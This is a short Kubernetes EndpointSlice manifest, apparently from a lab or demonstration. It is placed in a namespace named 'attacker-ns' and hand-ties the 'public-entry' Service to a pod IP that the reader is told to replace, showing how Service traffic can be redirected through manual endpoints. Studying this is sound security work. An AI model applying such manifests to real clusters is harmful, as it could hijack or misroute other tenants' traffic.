apiVersion: discovery.k8s.io/v1
kind: EndpointSlice
metadata:
  name: public-entry-initial
  namespace: attacker-ns
  labels:
    # This label ties the slice to the Service
    kubernetes.io/service-name: public-entry
addressType: IPv4
ports:
  - name: http
    protocol: TCP
    port: 80
endpoints:
  - addresses:
      - "10.244.0.9"   # <-- REPLACE with public-app pod IP
    conditions:
      ready: true
